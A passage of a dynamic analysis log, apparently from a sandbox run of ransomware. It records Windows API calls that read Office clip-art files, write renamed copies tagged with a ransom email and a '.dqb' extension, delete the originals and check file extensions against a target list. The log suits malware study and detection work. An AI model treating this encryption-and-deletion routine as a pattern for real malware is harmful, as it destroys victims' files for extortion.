lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.053] SetEndOfFile (hFile=0x22c) returned 1 [0053.053] CloseHandle (hObject=0x22c) returned 1 [0053.053] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.053] SetEndOfFile (hFile=0x218) returned 1 [0053.054] CloseHandle (hObject=0x218) returned 1 [0053.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0053.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.054] lstrlenW (lpString=".doc") returned 4 [0053.054] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.054] lstrlenW (lpString=".docx") returned 5 [0053.054] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.054] lstrlenW (lpString=".pdf") returned 4 [0053.054] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.054] lstrlenW (lpString=".xls") returned 4 [0053.054] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.054] lstrlenW (lpString=".xlsx") returned 5 [0053.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.054] lstrlenW (lpString=".ppt") returned 4 [0053.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.055] lstrlenW (lpString=".zip") returned 4 [0053.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.055] lstrlenW (lpString=".rar") returned 4 [0053.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.055] lstrlenW (lpString=".bz2") returned 4 [0053.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.055] lstrlenW (lpString=".7z") returned 3 [0053.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.055] lstrlenW (lpString=".dbf") returned 4 [0053.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.055] lstrlenW (lpString=".1cd") returned 4 [0053.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0053.055] lstrlenW (lpString=".jpg") returned 4 [0053.055] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.621] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.622] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.622] GetLastError () returned 0x0 [0053.622] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1306, lpOverlapped=0x0) returned 1 [0053.624] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1310, lpOverlapped=0x0) returned 1 [0053.629] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.630] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x240) returned 1 [0053.630] CloseHandle (hObject=0x240) returned 1 [0053.630] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x23c) returned 1 [0053.631] CloseHandle (hObject=0x23c) returned 1 [0053.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0053.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.631] lstrlenW (lpString=".doc") returned 4 [0053.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".docx") returned 5 [0053.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.632] lstrlenW (lpString=".pdf") returned 4 [0053.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".xls") returned 4 [0053.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.632] lstrlenW (lpString=".xlsx") returned 5 [0053.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.632] lstrlenW (lpString=".ppt") returned 4 [0053.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.632] lstrlenW (lpString=".zip") returned 4 [0053.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.632] lstrlenW (lpString=".rar") returned 4 [0053.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".bz2") returned 4 [0053.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".7z") returned 3 [0053.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.632] lstrlenW (lpString=".dbf") returned 4 [0053.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.632] lstrlenW (lpString=".1cd") returned 4 [0053.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0053.632] lstrlenW (lpString=".jpg") returned 4 [0053.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.632] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=7966) returned 1 [0053.633] CloseHandle (hObject=0x23c) returned 1 [0053.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 0x20 [0053.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.633] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.633] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.633] GetLastError () returned 0x0 [0053.633] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1f1e, lpOverlapped=0x0) returned 1 [0053.635] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1f20, lpOverlapped=0x0) returned 1 [0053.636] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.636] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.636] SetEndOfFile (hFile=0x240) returned 1 [0053.636] CloseHandle (hObject=0x240) returned 1 [0053.636] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.636] SetEndOfFile (hFile=0x23c) returned 1 [0053.637] CloseHandle (hObject=0x23c) returned 1 [0053.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0053.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.637] lstrlenW (lpString=".doc") returned 4 [0053.637] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.637] lstrlenW (lpString=".docx") returned 5 [0053.637] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.637] lstrlenW (lpString=".pdf") returned 4 [0053.638] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString=".xls") returned 4 [0053.638] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.638] lstrlenW (lpString=".xlsx") returned 5 [0053.638] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.638] lstrlenW (lpString=".ppt") returned 4 [0053.638] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.638] lstrlenW (lpString=".zip") returned 4 [0053.638] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.638] lstrlenW (lpString=".rar") returned 4 [0053.638] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString=".bz2") returned 4 [0053.638] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString=".7z") returned 3 [0053.638] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.638] lstrlenW (lpString=".dbf") returned 4 [0053.638] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.638] lstrlenW (lpString=".1cd") returned 4 [0053.638] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0053.638] lstrlenW (lpString=".jpg") returned 4 [0053.638] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.638] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.638] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.639] GetLastError () returned 0x0 [0053.639] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x34cb, lpOverlapped=0x0) returned 1 [0053.640] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x34d0, lpOverlapped=0x0) returned 1 [0053.641] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.641] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.641] SetEndOfFile (hFile=0x240) returned 1 [0053.642] CloseHandle (hObject=0x240) returned 1 [0053.642] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.642] SetEndOfFile (hFile=0x23c) returned 1 [0053.642] CloseHandle (hObject=0x23c) returned 1 [0053.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.643] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0053.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.643] lstrlenW (lpString=".doc") returned 4 [0053.643] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.643] lstrlenW (lpString=".docx") returned 5 [0053.643] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.643] lstrlenW (lpString=".pdf") returned 4 [0053.643] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.643] lstrlenW (lpString=".xls") returned 4 [0053.643] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.643] lstrlenW (lpString=".xlsx") returned 5 [0053.643] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.643] lstrlenW (lpString=".ppt") returned 4 [0053.643] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.643] lstrlenW (lpString=".zip") returned 4 [0053.643] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.643] lstrlenW (lpString=".rar") returned 4 [0053.643] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.643] lstrlenW (lpString=".bz2") returned 4 [0053.643] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.643] lstrlenW (lpString=".7z") returned 3 [0053.643] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.644] lstrlenW (lpString=".dbf") returned 4 [0053.644] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.644] lstrlenW (lpString=".1cd") returned 4 [0053.644] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0053.644] lstrlenW (lpString=".jpg") returned 4 [0053.644] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.645] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.645] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.645] GetLastError () returned 0x0 [0053.645] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4edd, lpOverlapped=0x0) returned 1 [0053.646] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4ee0, lpOverlapped=0x0) returned 1 [0053.647] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.648] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.648] SetEndOfFile (hFile=0x240) returned 1 [0053.648] CloseHandle (hObject=0x240) returned 1 [0053.648] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.648] SetEndOfFile (hFile=0x23c) returned 1 [0053.649] CloseHandle (hObject=0x23c) returned 1 [0053.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.649] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0053.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.649] lstrlenW (lpString=".doc") returned 4 [0053.649] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.649] lstrlenW (lpString=".docx") returned 5 [0053.649] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.649] lstrlenW (lpString=".pdf") returned 4 [0053.649] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.649] lstrlenW (lpString=".xls") returned 4 [0053.649] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.649] lstrlenW (lpString=".xlsx") returned 5 [0053.649] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.649] lstrlenW (lpString=".ppt") returned 4 [0053.650] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.650] lstrlenW (lpString=".zip") returned 4 [0053.650] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.650] lstrlenW (lpString=".rar") returned 4 [0053.650] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.650] lstrlenW (lpString=".bz2") returned 4 [0053.650] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.650] lstrlenW (lpString=".7z") returned 3 [0053.650] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.650] lstrlenW (lpString=".dbf") returned 4 [0053.650] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.650] lstrlenW (lpString=".1cd") returned 4 [0053.650] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0053.650] lstrlenW (lpString=".jpg") returned 4 [0053.650] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.650] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.650] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.651] GetLastError () returned 0x0 [0053.651] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4fe6, lpOverlapped=0x0) returned 1 [0053.652] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4ff0, lpOverlapped=0x0) returned 1 [0053.653] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.653] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.653] SetEndOfFile (hFile=0x240) returned 1 [0053.654] CloseHandle (hObject=0x240) returned 1 [0053.654] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.654] SetEndOfFile (hFile=0x23c) returned 1 [0053.654] CloseHandle (hObject=0x23c) returned 1 [0053.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0053.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.655] lstrlenW (lpString=".doc") returned 4 [0053.655] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.655] lstrlenW (lpString=".docx") returned 5 [0053.655] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.655] lstrlenW (lpString=".pdf") returned 4 [0053.655] lstrcmpiW 